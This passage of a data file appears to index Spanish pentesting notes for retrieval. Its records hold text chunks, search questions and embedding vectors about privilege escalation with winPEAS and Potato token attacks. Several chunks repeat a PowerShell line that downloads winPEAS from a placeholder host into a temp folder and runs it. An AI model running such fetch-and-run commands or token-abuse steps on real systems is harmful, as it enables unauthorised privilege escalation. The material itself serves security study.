-0.0058, -0.01283, 0.04828, -0.04083, 0.04624, 0.1015, 0.01057, 0.04647, 0.09185, -0.02776, -0.09401, -0.03417, 0.01995, -0.08157, -0.02918, -0.07982, 0.02898, -0.10352, -0.00899, 0.01964, 0.01685, -0.06957, 0.08579, 0.00782, 0.03506, 0.06003, 0.06519, 0.00182, -0.10807, 0.01969, -0.05728, -0.03344, 0.01111, -0.05049, -0.01888, 0.01166, -0.08716, 0.03442, 0.07072, -0.01625, 0.03732, -0.03576, 0.0214, 0.00472, 0.00749, 0.00513, -0.01103, 0.01346, 0.02048, -0.06643, 0.01625, -0.01518, 0.03435, 0.01938, -0.00342, -0.06764, 0.05969, -0.01682, 0.07216, -0.05232, 0.00879, 0.03265, -0.00327, 0.0783, 0.05617, 0.01344, 0.05087, 0.01335, -0.06529, -0.05046, 0.00935, -0.07798, -0.0318, -0.04141, -0.00056, -0.05523, -0.0463, 0.05339, 0.00383, -0.07697, -0.03797, -0.06802, -0.02782, -0.00594, 0.01231, -0.04725, -0.01556, 0.00711, 0.01789, -0.03116, -0.00693, 0.00101]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "indexar": "ΒΏCon quΓ© puedo hacer un anΓ‘lisis bΓ‘sico de la seguridad en Windows?", "v": [-0.19101, 0.17961, 0.05849, -0.0841, -0.06482, -0.09659, -0.06034, -0.07983, -0.09683, -0.11238, -0.04622, -0.11275, -0.07912, 0.01626, -0.02183, 0.04339, -0.02739, -0.02077, -0.01677, -0.03016, 0.01913, -0.15796, -0.08858, 0.04583, -0.04662, 0.00098, 0.02107, 0.00357, -0.12234, -0.01224, -0.04957, -0.00997, 0.0707, 0.05668, -0.10522, 0.07758, 0.00673, 0.10602, 0.10449, 0.07546, -0.05028, 0.00393, 0.05628, 0.03208, 0.18043, -0.06117, 0.06267, -0.07401, 0.06179, -0.07497, -0.05091, -0.09068, 0.00879, -0.13255, 0.00623, -0.06444, 0.10242, -0.10394, 0.10212, -0.03669, -0.10586, 0.08351, 0.04819, 0.04771, 0.00722, -0.05407, 0.03057, 2e-05, 0.05813, 0.10522, -0.0387, 0.00272, 0.00656, -0.00978, 0.01882, -0.02551, -0.04718, 0.0077, 0.08756, 0.04365, 0.03071, 0.12472, -0.01357, -0.07435, -0.10134, -0.10576, -0.09118, -0.0744, -0.05014, -0.06617, 0.10331, -0.01252, -0.07693, 0.03512, -0.01298, -0.02835, -0.0244, 0.00116, -0.08114, 0.08863, -0.02352, -0.22093, -0.01168, 0.06303, 0.00279, 0.02813, 0.00214, -0.03383, -0.10105, -0.09451, -0.04415, 0.0769, -0.13224, -0.05439, -0.08582, -0.01521, -0.02951, -0.05553, 0.05036, 0.02845, -0.03458, 0.0376, -0.08313, -0.05081, 0.04338, -0.03865, -0.00831, 0.18906, -0.03743, 0.0161, 0.09143, -0.01773, -0.14449, -0.0647, -0.06061, 0.08337, 0.0362, -0.09835, -0.03459, -0.09247, 0.11065, 0.07872, 0.04277, 0.03671, 0.01978, 0.07587, 0.07492, -0.00387, -0.07537, -0.01771, 0.04529, -0.00314, -0.07625, 0.01096, -0.01018, -0.00029, 0.02247, -0.00821, 0.0683, 0.01951, 0.06113, -0.00155, 0.01217, -0.06764, 0.05959, -0.00681, -0.00434, -0.03969, 0.0126, 0.00228, -0.04352, 0.03632, 0.02465, -0.06133, 0.0499, 0.01111, -0.0183, -0.06005, -0.0716, -0.04441, -0.00597, -0.02251, 0.00012, 0.0195, 0.0517, -0.03929, 0.00553, 0.01657, -0.00405, 0.01765, -0.0618, 0.03609, -0.01055, 0.00397, -0.01044, -0.06198, 0.00506, -0.08908, 0.01245, 0.03562, -0.02469, -0.05096, -0.00031, -0.021, 0.12368, 0.03611, -0.06648, 0.04403, 0.03226, 0.03515, 0.0143, -0.0092, 0.03636, -0.07239, -0.02557, -0.01575, 0.03785, 0.05097, -0.03917, 0.00097, 0.01345, 0.06001, 0.01553, -0.0013, -0.02907, -0.02879, -0.08852, -0.05263, 0.06283, 0.0246, 0.03254, 0.01755, -0.05484, 0.00236, 0.04917, -0.02349, -0.04119, 0.00076, -0.02434, -0.00572, -0.00374, 0.07544, -0.05926, -0.0835, -0.04744, -0.00874, -0.05528, 0.06657, -0.01867, -0.08428, 0.01668, -0.00947, 0.04904, -0.03434, -0.00995, 0.01183]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "indexar": "Existe alguna herramienta para verificar el estado inicial de un sistema Windows?", "v": [-0.07754, 0.15409, -0.1646, -0.11306, 0.05386, -0.12477, -0.09582, -0.14776, -0.02848, -0.15484, -0.07423, -0.11431, -0.06292, -0.05178, 0.10827, 0.04933, -0.0242, -0.15325, -0.01162, -0.04166, -0.03117, -0.08241, -0.0569, -0.00617, -0.1237, 0.08388, -0.11994, -0.11765, -0.1888, -0.00576, 0.04449, 0.01731, 0.02082, -0.10023, -0.13472, -0.06833, 0.0051, 0.08219, 0.06579, 0.07097, 0.02117, 0.12541, 0.07723, 0.07855, 0.06992, 0.00597, -0.01417, -0.02608, 0.0245, -0.00586, -0.00156, -0.0538, -0.15443, -0.01566, 0.01285, -0.12054, 0.08645, -0.02352, 0.06056, -0.04783, -0.08271, 0.0323, -0.0876, -0.05019, -0.01164, 0.09365, 0.06037, -0.08965, -0.00443, 0.11642, -0.02843, 0.04094, 0.05359, -0.0327, -0.05983, 0.01916, 0.01598, -0.01386, 0.14238, -0.02673, 0.04764, 0.11526, -0.01835, -0.0236, -0.08034, -0.14731, -0.02774, -0.07273, 0.02427, -0.12338, -0.00741, -0.01399, -0.02728, 0.14934, 0.06422, -0.03559, -0.0014, -0.05815, -0.06861, 0.05236, 0.10978, -0.10524, -0.03928, 0.08409, -0.09042, -0.04277, 0.01853, -0.0464, -0.01322, -0.0271, 0.03161, 0.05446, -0.03621, 0.00651, -0.02402, 0.02675, -0.03412, -0.12496, 0.0174, -0.01171, -0.00548, 0.08487, -0.11422, -0.04588, 0.0546, -0.04299, -0.02279, 0.08814, -0.0062, 0.02017, 0.10446, -0.04755, -0.11065, 0.00054, -0.07978, 0.00138, -0.02728, -0.0145, 0.02514, -0.04451, 0.02353, 0.10068, 0.06083, -0.09428, 0.05445, 0.04921, 0.04747, 0.01564, -0.07088, -0.02524, -0.00203, -0.02006, -0.02778, 0.00388, -0.00505, 0.01537, 0.02728, 0.07958, 0.06034, -0.02469, 0.02697, -0.05049, 0.01899, -0.06187, -0.00139, 0.01065, 0.00216, 0.02637, 0.1012, -0.00763, -0.00416, 0.02565, 0.06025, -0.0463, -0.01586, -0.01235, -0.02874, -0.03919, -0.01422, -0.0568, -0.04749, 0.07231, 0.00859, -0.02779, -0.03546, 0.0121, -0.02384, 0.05042, -0.04077, 0.04083, 0.01814, -0.00893, 0.05074, -0.04486, 0.05526, 0.02079, -0.02499, -0.06281, 0.05816, 0.03046, -0.0973, 0.00946, -0.03625, -0.10896, 0.0314, 0.08435, 0.00939, -0.01191, 0.03728, 0.04851, 0.02791, 0.01532, 0.01132, -0.03255, -0.05747, -0.03023, -0.00234, -0.0057, -0.03973, -0.03037, 0.02184, -0.01089, 0.07805, 0.07023, -0.01204, 0.00885, -0.05162, 0.07642, -0.02083, -0.01739, 0.02599, -0.0318, 0.03436, 0.0093, 0.03632, -0.06147, 0.06006, -0.054, -0.04337, -0.02765, 0.02067, 0.07992, -0.00088, -0.05809, -0.03166, -0.00326, -0.02067, -0.02832, -0.00826, -0.09006, 0.01891, 0.01658, 0.02676, -0.0454, -0.00508, -0.02327]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "indexar": "ΒΏCΓ³mo ejecuto un script que descarga y analiza automΓ‘ticamente una imagen de Windows?", "v": [-0.11849, 0.16335, -0.0003, -0.19017, 0.04051, -0.09138, -0.12957, -0.08383, -0.02716, -0.09858, -0.08495, -0.19096, -0.0891, -0.05013, -0.00553, -0.04125, 0.05431, -0.02606, 0.04663, -0.05399, 0.00988, -0.08425, -0.08963, -0.07399, -0.08513, 0.03911, -0.06825, 0.09677, -0.12133, -0.04374, -0.01036, 0.0213, 0.08044, -0.04322, -0.05237, 0.10195, 0.0926, -0.00968, 0.04894, 0.19245, 0.02548, 0.07217, -0.06075, 0.10094, -0.00989, -0.04297, 0.09744, -0.05733, 0.05183, -0.07861, 0.07276, 0.02098, -0.00857, -0.06801, -0.02586, -0.07198, 0.15894, -0.14191, 0.01853, 0.04685, 0.05391, 0.1097, -0.0113, 0.07169, 0.07073, 0.04239, 0.02539, -0.02074, 0.01386, 0.11673, -0.02268, 0.05834, -0.00615, 0.06916, 0.01599, 0.04448, -0.10031, -0.07327, 0.02419, -0.03353, 0.07527, -0.04233, -0.0339, -0.01617, -0.09912, -0.11531, -0.1364, -0.01221, 0.05162, -0.08282, 0.06074, -0.14036, -0.01375, 0.12833, 0.02232, -0.06991, -0.00017, -0.09029, 0.08466, 0.09595, -0.031, -0.13258, 0.00056, 0.02931, 0.06173, 0.08358, -0.00235, -0.07299, -0.17101, -0.05878, 0.04492, 0.0623, -0.03153, 0.01763, -0.08591, -0.05362, -0.01395, -0.02398, -0.00876, -0.00514, -0.06832, 0.04432, -0.05708, -0.00311, -0.06599, -0.11616, -0.00247, 0.06982, -0.13994, -0.00855, -0.01926, 0.01271, -0.10189, -0.03674, -0.13663, 0.04303, 0.07847, -0.01385, -0.08433, -0.1066, 0.05424, 0.06198, 0.0431, -0.00334, 0.00969, 0.0048, 0.0202, -0.06946, -0.0556, 0.01523, 0.051, 0.01618, -0.01121, -0.00948, 0.0047, -0.03406, 0.02686, 0.07589, 0.0225, -0.00833, -0.01955, -0.06398, 0.0379, 0.00423, 0.01913, -0.01207, -0.01317, -0.00825, -0.0179, 0.00297, -0.01592, 0.01519, -0.0873, -0.06902, 0.0283, -0.02366, 0.05283, -0.05759, -0.05415, 0.03233, -0.0309, -0.00334, 0.06966, 0.01231, -0.00145, 0.02237, 0.04407, -0.04281, -0.03507, 0.0306, 0.0013, -0.00775, -0.04147, -0.04158, 0.06386, 0.01121, -0.0473, 0.00498, 0.00903, 0.04273, -0.0829, -0.04345, 0.05207, 0.01621, 0.04988, 0.00072, -0.04485, 0.04516, -0.00972, 0.00193, -0.04104, 0.06299, 0.05119, -0.0502, -0.00812, -0.05993, 0.01822, -0.00059, 0.00617, -0.00452, -0.02619, 0.07215, 0.09625, 0.04686, -0.03605, 0.02705, -0.03652, 0.06936, -0.00503, -0.00116, 0.02322, 0.08179, -0.00939, 0.00209, 0.04069, 0.00953, -0.03144, -0.03896, -0.02549, -0.0672, 0.01475, 0.04351, -0.04598, -0.04511, -0.08623, -0.02899, -0.01378, -0.02114, 0.0149, -0.0387, -0.00425, -0.01507, 0.03344, 0.02163, 0.00267, 0.03539]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lΓ³gica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "ΒΏquΓ© herramienta me ayuda a identificar vulnerabilidades en Windows pero requiere revisiΓ³n manual?", "v": [-0.04368, 0.16439, -0.08586, -0.19472, 0.04961, -0.08874, -0.14427, -0.04223, -0.06169, -0.12643, 0.01404, -0.15982, -0.00759, -0.04984, 0.00903, 0.05096, -0.0031, -0.08154, 0.03747, -0.02484, -0.0016, -0.09213, -0.09365, 0.00621, -0.12299, 0.02744, 0.01878, -0.03065, -0.12495, -0.07083, -0.00359, -0.05766, -0.03325, -0.00805, -0.15496, 0.08785, 0.00704, 0.02613, 0.06268, 0.11938, 0.05439, 0.07958, -0.02261, 0.0674, 0.13646, -0.06396, -0.00412, 0.00915, 0.00821, 0.11642, -0.06885, -0.10235, -0.09595, -0.04522, 0.02331, -0.16027, 0.28974, -0.07708, 0.05256, -0.10474, -0.09299, 0.05164, -0.01675, 0.05186, 0.00627, -0.03643, 0.04694, -0.09158, -0.04691, 0.16011, -0.0577, -0.00538, 0.0406, -0.03826, -0.0681, -0.00902, 0.04987, -0.00417, 0.11352, -0.06065, 0.08651, 0.13623, 0.01034, 3e-05, -0.04563, -0.16117, 0.0326, 0.02654, 0.06954, -0.15885, 0.04091, -0.05796, -0.09508, -0.00643, 0.04591, 0.03572, 0.02961, -0.04828, -0.02299, 0.01333, 0.03439, -0.17131, 0.02307, 0.04941, 0.02661, 0.01384, -0.04215, -0.03126, -0.16157, -0.00893, 0.04182, 0.07291, -0.05139, 0.03965, -0.03655, 0.07765, 0.00943, -0.05406, 0.03302, -0.03348, 0.01812, 0.02119, -0.09188, -0.02386, 0.00191, -0.04344, 0.034, 0.13366, -0.0207, -0.06067, 0.00921, -0.06921, -0.06696, -0.02588, -0.00533, 0.05867, 0.01543, -0.05781, -0.02816, 0.006, 0.04108, 0.00784, 0.03916, -0.02155, 0.0552, 0.02506, 0.0677, -0.00467, -0.04179, 0.01126, 0.04507, -0.00844, -0.0025, 0.03484, -0.03266, -0.01223, -0.00163, 0.09432, -0.07288, -0.02864, -0.00529, -0.02483, 0.02654, -0.05682, 0.02701, 0.0247, 0.05256, 0.06851, 0.09584, -0.0189, 0.02474, 0.00783, 0.02045, 0.00919, 0.03213, -0.08424, 0.05365, -0.00699, -0.04136, -0.03151, -0.02576, -0.01006, 0.01111, -0.01396, 0.04226, -0.03217, 0.03328, -0.0313, 0.01062, 0.01853, -0.03951, -0.01309, 0.00837, -0.02843, 0.06804, 0.01063, -0.02881, -0.0466, 0.00335, -0.02794, -0.04833, -0.04283, -0.06059, -0.04832, 0.11409, 0.10141, -0.05172, -0.00218, 0.04085, 0.04771, 0.00475, 0.03867, 0.0398, -0.01241, -0.03346, -0.06325, -0.00054, 0.05355, -0.04448, -0.06046, 0.02126, -0.02868, 0.06384, 0.02671, -0.00206, -0.00398, -0.00071, -0.02929, -0.00235, 0.02372, 0.04499, -0.01877, -0.01917, 0.00279, 0.02563, -0.05738, 0.04507, -0.03612, 0.00769, 0.00208, 0.00851, 0.01897, 0.00515, -0.04099, -0.05377, -0.03271, 0.03807, -0.01884, -0.04441, -0.03877, -0.02988, -0.00078, 0.03922, -0.07661, 0.0094, -0.0327]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lΓ³gica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "con quΓ© puedo detectar credenciales ocultas que no encuentra un escΓ‘ner automΓ‘tico?", "v": [-0.04822, 0.08132, -0.14716, 0.02608, 0.04081, -0.00898, -0.00216, 0.10255, -0.10653, -0.11359, -0.08512, 0.0039, -0.10469, -0.05633, 0.12163, 0.10229, 0.10051, -0.06015, 0.01487, 0.01978, 0.01905, -0.19316, 0.01815, -0.12657, 0.02424, -0.02957, -0.03602, 0.01238, -0.07927, -0.0508, 0.03679, 0.07983, 0.0257, 0.06095, -0.04207, 0.03511, -0.15425, -0.03404, 0.02677, 0.05753, 0.08715, 0.08692, -0.01909, 0.04552, 0.12066, 0.02129, -0.10685, 0.07332, -0.11948, -0.05189, -0.01488, -0.12862, -0.14679, -0.0909, -0.01894, -0.07699, 0.12448, 0.12459, 0.17981, -0.10934, 0.04576, 0.08477, 0.02161, 0.06456, -0.04038, 0.00401, 0.00718, -0.02865, -0.00519, -0.03659, 0.00084, 0.04144, 0.09202, 0.07982, 0.05732, 0.03964, -0.0494, -0.01964, 0.11622, -0.00876, 0.06344, -0.0111, -0.00982, 0.09311, 0.03001, -0.02214, -0.07086, 0.02006, -0.08136, -0.08712, 0.05219, 0.02176, -0.02251, 0.06332, 0.02196, 0.05612, 0.09064, -0.05224, -0.11309, 0.04064, 0.01554, -0.13672, -0.1245, 0.1725, 0.01332, 0.03027, -0.01816, 0.01497, 0.00824, -0.05057, 0.07121, -0.00263, -0.0806, -0.09763, -0.00749, 0.10967, 0.02846, -0.00249, 0.0228, 0.04417, -0.08592, -0.02084, 0.00813, -0.04833, 0.01178, -0.10103, -0.06039, 0.06142, 0.01661, -0.02831, -0.0392, -0.0508, -0.0378, -0.04386, -0.02303, 0.06476, -0.06335, -0.04866, -0.03617, 0.10543, 0.02048, -1e-05, 0.01322, -0.09033, 0.10453, -0.01246, -0.01054, -0.07319, 0.03205, -0.08194, -0.01438, 0.09223, 0.08463, 0.03961, 0.02998, 0.0051, 0.06278, -0.09328, 0.02799, 0.02176, 0.02233, 0.03492, -0.04653, 0.00872, -0.00247, -0.00275, -0.02034, -0.05896, 0.03182, 0.00274, -0.02124, 0.02224, -0.00563, -0.10225, -0.01564, 0.0068, 0.04842, -0.08303, 0.04972, -0.07802, -0.03794, 0.04022, -0.03402, -0.10763, 0.03471, -0.00765, 0.02904, -0.03422, 0.01032, 0.03716, 0.05908, -0.05327, 0.00062, 0.03775, 0.00808, -0.00769, 0.09341, -0.01766, 0.04449, -0.05198, -0.06269, 0.00602, -0.05049, -0.01204, -0.01542, 0.02188, -0.01629, 0.08082, 0.00148, 0.02563, 0.08021, -0.0306, 0.08612, -0.09265, -0.08737, 0.00675, -0.05365, -0.03248, -0.05151, -0.02407, 0.02986, -0.00852, 0.07515, -0.01158, 0.05752, -0.03247, -0.02542, 0.06858, 0.06731, 0.03558, 0.0117, 0.06218, -0.05365, 0.01708, 0.02569, 0.00088, 0.02486, -0.05004, -0.03955, -0.03502, 0.03429, 0.03193, 0.02931, -0.07973, -0.03395, -0.01281, -0.02352, 0.05742, 0.00372, -0.03164, -0.02463, 0.09303, 0.04906, -0.08052, 0.0815, -0.01441]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lΓ³gica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "necesito una tΓ©cnica para revisar scripts de cron especΓ­ficos en Linux y Windows, ΒΏquΓ© programa sirve?", "v": [-0.08635, 0.01745, -0.13875, -0.19347, 0.08617, -0.27642, -0.16175, -0.05036, 0.02526, -0.09533, 0.00908, -0.12725, 0.00075, -0.15746, 0.04051, -0.04471, -0.03572, -0.16069, 0.13886, 0.01858, -0.08579, -0.07828, -0.08223, 0.02618, -0.02955, -0.04014, 0.09937, -0.10287, -0.07666, 0.02244, -0.08162, 0.05138, 0.05635, 0.00461, -0.05455, 0.08915, 0.08012, 0.05095, 0.09692, 0.17361, 0.05906, 0.02453, -0.05995, 0.08447, 0.04982, -0.15601, 0.14554, -0.01895, 0.00733, -0.06065, 0.06853, 0.0453, -0.03629, -0.0227, 0.01614, -0.03954, 0.05867, -0.1282, -0.02643, 0.05628, -0.05801, -0.01964, 0.03135, -0.02295, 0.05088, -0.01479, -0.00558, -0.06637, -0.04045, 0.04387, -0.08992, 0.07252, 0.00039, -0.0039, 0.01653, 0.02031, -0.09813, -0.0088, 0.06227, -0.04943, 0.02425, 0.06959, 0.04073, 0.03688, -0.11563, -0.13616, -0.03516, 0.05141, -0.04233, -0.05519, 0.10437, 0.01837, 0.00599, 0.05261, 0.0875, 0.0115, 0.12183, 0.02275, 0.05322, 0.06314, -0.05272, -0.12127, -0.0219, 0.12438, -0.03052, 0.10781, 0.06402, -0.0239, -0.04763, -0.0116, 0.02472, 0.05277, -0.04943, 0.00896, -0.05234, -0.04118, -0.00584, -0.06244, 0.03322, 0.01654, -0.07182, 0.07878, -0.06803, 0.01495, 0.02124, -0.09351, -0.0036, 0.08116, -0.05878, 0.05427, 0.0168, -0.05158, -0.06095, -0.03767, -0.10067, 0.07229, 0.09143, -0.04369, -0.02428, -0.03228, 0.03404, 0.07085, 0.03045, 0.07761, 0.10069, -0.04816, 0.07024, -0.04457, -0.03048, -0.04947, 0.02507, -0.01841, 0.0221, 0.00356, -0.08097, -0.12077, 0.01641, 0.06378, -0.07313, -0.02488, -0.00276, -0.04826, -0.02366, -0.03455, 0.00426, -0.01568, -0.0201, 0.08075, 0.04004, 0.05135, 0.01075, 0.04523, -0.01041, -0.06166, 0.01159, -0.03538, 0.04474, -0.06972, -0.04571, -0.0225, -0.06307, 0.00655, 0.073, -0.00915, 0.01851, -0.00588, -0.06707, 0.03461, 0.02049, 0.01543, -0.02587, -0.0364, -0.01116, -0.05097, -0.01232, 0.038, -0.06533, -0.00703, -0.00934, 0.00533, -0.06115, 0.0674, 0.00263, -0.02409, 0.0691, 0.04379, -0.05073, -0.02824, 0.01131, 0.02129, -0.0105, 0.02894, 0.01057, 0.05498, -0.00741, -0.06688, 0.00652, 0.06654, 0.06879, -0.00309, 0.02353, -0.03563, 0.0306, -0.01514, -0.00381, -0.0963, 0.02453, 0.00203, -0.01394, 0.02598, 0.00785, -0.00033, -0.01503, 0.03931, 0.02955, -0.04149, -0.00702, -0.02986, 0.01624, -0.04322, -0.07295, 0.06527, -0.00363, -0.08149, -0.06971, -0.02106, -0.04546, -0.02317, -0.02154, -0.00569, 0.00305, -0.00828, 0.02209, -0.02765, -0.00755, 0.06425]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Potato attacks\n\n> Cuando `whoami /priv` muestra **SeImpersonatePrivilege** o **SeAssignPrimaryTokenPrivilege** β†’ abuso de token a **NT AUTHORITY\\SYSTEM**.", "indexar": "que programa sirve para verificar si tengo el privilegio SeImpersonatePrivilege", "v": [-0.18419, 0.09741, -0.20251, -0.10294, 0.18656, -0.12983, 0.08531, -0.15135, -0.11578, -0.18273, 0.04289, 0.02193, 0.04913, -0.14872, 0.09148, 0.08696, 0.08044, -0.18635, 0.12535, 0.06938, 0.15434, -0.00099, -0.01525, -0.07148, -0.03409, 0.05859, 0.0658, -0.00152, -0.02857, 0.01432, 0.06676, 0.01158, 0.04406, -0.17069, 0.07349, -0.0334, 0.0174, 0.00807, 0.0235, 0.06908, 0.21458, -0.01313, 0.00863, 0.00331, 0.04151, -0.02655, 0.0098, 0.05797, -0.00034, -0.00172, -0.0205, 0.0914, 0.05218, -0.03265, -0.02822, 0.01487, -0.09149, 0.01896, -0.04827, -0.00369, 0.00334, -0.05801, 0.11058, 0.01032, 0.03235, -0.00957, 0.11319, 0.03284, -0.01187, -0.09811, -0.11389, -0.03197, -0.01086, -0.07469, -0.11248, -0.035, 0.02378, -0.05465, 0.08095, -0.04442, 0.01387, 0.03064, -0.02409, 0.07931, -0.09683, 0.00856, 0.06532, -0.01861, -0.02745, -0.01438, 0.03365, 0.11977, 0.039, 0.03637, 0.01461, 0.02441, 0.05639, 0.0978, 0.07551, 0.08337, 0.16963, -0.08215, -0.0126, 0.11105, -0.02092, 0.06695, 0.04052, -0.12437, -0.08883, 0.02616, -0.01627, -0.01905, -0.0703, -0.04823, -0.05804, 0.06719, -0.03022, -0.09029, 0.05796, 0.0108, -0.06982, -0.01143, -0.05109, -0.007, 0.08739, -0.06077, -0.03818, 0.0525, -0.01024, 0.12055, -0.00426, 0.01436, -0.01278, -0.01683, -0.00193, -0.05434, -0.04614, -0.03693, 0.03199, -0.03286, 0.0732, 0.02725, 0.01247, -0.0235, 0.05112, 0.00947, -0.03099, -0.02466, -0.06136, 0.00882, -0.02098, -0.04716, 0.04331, 0.11615, -0.02735, -0.01984, -0.03566, -0.01325, 0.02435, 0.03101, 0.00926, -0.00913, -0.01445, -0.03068, 0.09108, -0.01354, 0.00495, -0.08558, 0.07725, -0.00673, -0.0072, -0.00183, 0.00055, -0.06312, -0.06115, -0.02525, -0.0223, 0.02341, 0.05408, -0.00549, -0.10987, 0.02869, 0.03916, -0.01209, -0.0708, -0.01803, -0.03327, 0.03998, 0.04345, 0.00546, 0.03067, 0.06296, 0.00135, 0.01735, -0.03003, 0.00379, -0.05714, 0.017, 0.0069, -0.00172, -0.02835, 0.04796, -0.06242, -0.05012, -0.03476, 0.06186, -0.00694, -0.0422, -0.00072, 0.10655, -0.01155, -0.01235, 0.05709, -0.04467, 0.00734, 0.01854, 0.0635, 0.01018, -0.01382, 0.01466, 0.01147, -0.00794, 0.02625, 0.02163, 0.036, -0.02147, 0.02161, 0.03282, 0.07688, 0.03583, -0.00921, -0.00977, 0.03189, -0.05818, 0.051, 0.05209, 0.03141, -0.01309, -0.00378, -0.08746, 0.03069, 0.07056, -0.015, -0.08177, 0.01157, -0.0429, -0.05936, -0.02292, 0.01055, -0.02056, 0.02855, 0.01358, 0.03234, -0.02611, 0.04946, 0.00453]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Potato attacks\n\n> Cuando `whoami /priv` muestra **SeImpersonatePrivilege** o **SeAssignPrimaryTokenPrivilege** β†’ abuso de token a **NT AUTHORITY\\SYSTEM**.", "indexar": "con que puedo detectar el abuso de tokens a NT AUTHORITY\\SYSTEM en Windows", "v": [-0.24817, -0.10657, -0.22403, -0.16261, 0.11485, 0.02024, -0.19653, 0.02273, 0.04965, 0.10144, -0.16841, 0.01895, -0.01247, 0.11147, 0.01772, 0.03753, -0.01328, -0.17828, 0.08352, 0.09715, -0.02037, -0.1066, -0.00494, 0.02387, 0.11226, 0.04131, -0.06925, -0.0833, -0.02954, 0.08163, 0.01141, -0.07218, 0.00219, -0.01694, -0.04832, -0.11469, -0.05774, 0.03399, 0.07948, 0.08341, 0.09971, 0.13714, 0.02257, 0.05254, 0.17097, 0.06677, -0.05648, -0.13554, 0.04277, -0.10274, -0.05912, -0.00241, -0.15257, -0.17591, 0.03205, -0.09942, 0.06183, 0.07747, 0.04344, 0.01619, -0.05202, -0.04021, -0.02774, -0.06128, -0.01983, -0.00108, 0.05778, 0.01852, -0.03997, 0.15019, -0.06892, -0.05545, 0.15487, -0.01425, 0.05848, 0.06378, -0.0631, -0.07798, 0.1261, -0.01503, 0.00115, 0.01774, -0.0175, 0.02345, -0.00634, -0.06637, 0.02968, 0.0044, 0.08216, -0.11818, 0.06019, -0.04503, 0.02953, 0.04234, 0.05606, -0.03827, -0.01327, -0.0529, -0.01636, 0.04966, 0.03458, -0.11655, -0.01012, 0.08171, 0.01799, 0.03606, 0.02539, -0.01009, 0.03166, -0.0864, -0.08035, -0.01812, -0.01843, -0.05733, 0.03841, 0.02583, 0.0256, 0.03109, -0.04274, 0.00865, -0.06098, 0.00022, -0.06004, -0.02654, 0.07574, -0.09054, 0.0152, 0.03748, -0.04823, 0.03049, 0.08804, 0.02863, -0.05459, -0.04924, 0.01529, 0.04219, -0.04356, 0.01975, 0.01219, 0.00942, 0.07242, 0.13251, 0.04899, 0.03978, 0.05387, 0.03731, 0.00928, 0.0037, -0.00529, -0.00856, 0.07437, -0.01363, -0.01198, -0.01371, -0.04453, 0.01978, 0.06743, 0.02994, -0.03397, -0.03436, -0.02999, 0.04667, 0.00519, 0.01749, 0.02733, 0.02377, 0.04591, -0.00014, 0.03291, -0.02619, -0.02303, 0.07352, -0.01892, -0.01405, 0.05153, -0.0308, 0.01094, -0.0024, -0.05201, -0.07866, -0.06774, -0.04062, 0.05413, -0.05384, 0.04254, 0.03937, -0.08423, 0.0332, -0.02651, 0.01571, 0.04687, 0.0787, 0.02648, -0.00969, 0.01122, 0.01718, 0.00773, -0.03682, 0.05753, 0.00443, -0.01589, -0.00429, -0.0291, -0.00651, -0.00412, 0.07469, -0.0062, 0.01635, 0.05246, 0.00033, 0.07406, -0.00205, 0.03378, -0.07032, -0.07729, -0.06362, 0.01711, -0.00879, 0.0132, -0.0114, -0.01853, 0.04033, 0.07949, 0.03902, 0.00304, -0.0373, -0.03381, 0.02125, 0.04323, 0.0145, 0.00173, 0.03084, -0.01325, -0.01785, -0.00973, -0.01851, -0.00904, -0.02472, -0.03563, -0.00975, 0.00344, 0.04919, 0.01089, -0.061, -0.01923, -0.04148, -0.03031, -0.03159, 0.02811, 0.00538, 0.02396, 0.0067, 0.05805, -0.06591, -0.02807, 0.02652]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - 